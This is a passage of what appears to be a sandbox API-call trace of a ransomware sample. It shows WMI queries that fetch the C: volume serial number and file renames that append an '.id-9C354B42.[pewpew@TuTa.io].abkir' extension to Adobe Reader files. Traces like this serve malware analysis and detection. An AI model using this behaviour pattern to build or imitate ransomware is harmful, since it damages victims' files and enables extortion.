puCount=0x8f6edfc*=0x0) returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0186.268] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0186.268] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0186.268] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0186.268] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0186.268] IUnknown:Release (This=0xb51e34) returned 0x1 [0186.269] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027740) returned 0x0 [0186.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027740, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0186.269] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027740, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030da0) returned 0x0 [0186.270] WbemDefPath:IUnknown:Release (This=0x6027740) returned 0x0 [0186.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030da0) returned 0x0 [0186.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0186.270] WbemDefPath:IUnknown:AddRef (This=0x6030da0) returned 0x3 [0186.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0186.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0186.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbdf010) returned 0x0 [0186.270] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf010, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0186.270] WbemDefPath:IUnknown:Release (This=0xbdf010) returned 0x3 [0186.270] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0186.270] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0186.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0186.270] WbemDefPath:IUnknown:Release (This=0x6030da0) returned 0x2 [0186.270] WbemDefPath:IUnknown:Release (This=0x6030da0) returned 0x1 [0186.270] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0186.270] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0186.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030da0, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030da0) returned 0x0 [0186.271] WbemDefPath:IUnknown:AddRef (This=0x6030da0) returned 0x3 [0186.271] WbemDefPath:IUnknown:Release (This=0x6030da0) returned 0x2 [0186.271] WbemDefPath:IWbemPath:SetText (This=0x6030da0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0186.271] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030da0, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0186.271] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0186.271] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0186.271] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0186.271] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0186.271] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0186.271] IUnknown:Release (This=0xb51e34) returned 0x1 [0186.272] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x601f600) returned 0x0 [0186.272] WbemLocator:IUnknown:QueryInterface (in: This=0x601f600, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0186.272] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f600, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027720) returned 0x0 [0186.272] WbemLocator:IUnknown:Release (This=0x601f600) returned 0x0 [0186.272] WbemLocator:IUnknown:QueryInterface (in: This=0x6027720, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027720) returned 0x0 [0186.272] WbemLocator:IUnknown:QueryInterface (in: This=0x6027720, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0186.272] WbemLocator:IUnknown:AddRef (This=0x6027720) returned 0x3 [0186.272] WbemLocator:IUnknown:QueryInterface (in: This=0x6027720, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0186.272] WbemLocator:IUnknown:QueryInterface (in: This=0x6027720, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0186.272] WbemLocator:IUnknown:QueryInterface (in: This=0x6027720, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0186.272] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0186.272] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0186.272] WbemLocator:IUnknown:QueryInterface (in: This=0x6027720, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0186.273] WbemLocator:IUnknown:Release (This=0x6027720) returned 0x2 [0186.273] WbemLocator:IUnknown:Release (This=0x6027720) returned 0x1 [0186.273] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0186.273] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0186.273] WbemLocator:IUnknown:QueryInterface (in: This=0x6027720, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027720) returned 0x0 [0186.273] WbemLocator:IUnknown:AddRef (This=0x6027720) returned 0x3 [0186.273] WbemLocator:IUnknown:Release (This=0x6027720) returned 0x2 [0186.273] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030da0, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0186.273] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0186.273] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0186.273] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6027730) returned 0x0 [0186.273] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027730, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x603326c) returned 0x0 [0187.225] WbemLocator:IUnknown:QueryInterface (in: This=0x603326c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5aaa4) returned 0x0 [0187.225] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5aaa4, pProxy=0x603326c, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0187.225] WbemLocator:IUnknown:Release (This=0xb5aaa4) returned 0x1 [0187.225] WbemLocator:IUnknown:QueryInterface (in: This=0x603326c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5aac4) returned 0x0 [0187.225] WbemLocator:IUnknown:QueryInterface (in: This=0x603326c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5aaa4) returned 0x0 [0187.225] WbemLocator:IClientSecurity:SetBlanket (This=0xb5aaa4, pProxy=0x603326c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0187.225] WbemLocator:IUnknown:Release (This=0xb5aaa4) returned 0x2 [0187.225] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x1 [0187.225] CoTaskMemFree (pv=0xbd4a38) [0187.225] WbemLocator:IUnknown:Release (This=0x6027730) returned 0x0 [0187.827] WbemLocator:IUnknown:QueryInterface (in: This=0x603326c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5aac4) returned 0x0 [0187.828] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0188.044] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0188.048] WbemLocator:IUnknown:AddRef (This=0xb5aac4) returned 0x3 [0188.048] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0188.048] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0188.048] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5aa24) returned 0x0 [0188.050] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5aa24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0188.050] WbemLocator:IUnknown:Release (This=0xb5aa24) returned 0x3 [0188.050] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0188.050] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0188.050] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5aaac) returned 0x0 [0188.050] WbemLocator:IRpcOptions:Query (in: This=0xb5aaac, pPrx=0xb5aac4, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0188.050] WbemLocator:IUnknown:Release (This=0xb5aaac) returned 0x3 [0188.051] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x2 [0188.054] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0188.054] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0188.054] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x603326c) returned 0x0 [0188.054] WbemLocator:IUnknown:AddRef (This=0x603326c) returned 0x4 [0188.054] WbemLocator:IUnknown:Release (This=0x603326c) returned 0x3 [0188.054] WbemLocator:IUnknown:Release (This=0x603326c) returned 0x2 [0188.054] SysStringLen (param_1=0x0) returned 0x0 [0188.054] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e10, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0188.054] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0188.054] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0188.054] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0188.055] WbemLocator:IUnknown:AddRef (This=0xb5aac4) returned 0x3 [0188.055] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aac4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5aac4) returned 0x0 [0188.055] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x3 [0188.055] WbemLocator:IUnknown:Release (This=0xb5aac4) returned 0x2 [0188.055] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0188.055] WbemDefPath:IWbemPath:GetText (in: This=0x6030e10, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0188.055] IWbemServices:GetObject (in: This=0x603326c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028978, ppCallResult=0x0) returned 0x0 [0189.057] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030da0, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0189.057] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0189.057] WbemDefPath:IWbemPath:GetText (in: This=0x6030da0, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0189.057] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37af5b4*=0, plFlavor=0x37af5b8*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37af5b4*=8, plFlavor=0x37af5b8*=0) returned 0x0 [0189.057] SysStringByteLen (bstr="9C354B42") returned 0x10 [0189.058] SysStringByteLen (bstr="9C354B42") returned 0x10 [0189.058] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x37af5b4*=8, plFlavor=0x37af5b8*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x37af5b4*=8, plFlavor=0x37af5b8*=0) returned 0x0 [0189.058] SysStringByteLen (bstr="9C354B42") returned 0x10 [0189.058] SysStringByteLen (bstr="9C354B42") returned 0x10 [0189.058] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm", lpFilePart=0x0) returned 0x33 [0189.058] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x56 [0189.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0189.058] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x293d42a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0189.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0189.059] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0189.060] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", lpFilePart=0x0) returned 0x35 [0189.060] GetFullPathNameW (in: lpFileName="C:\\Program Files 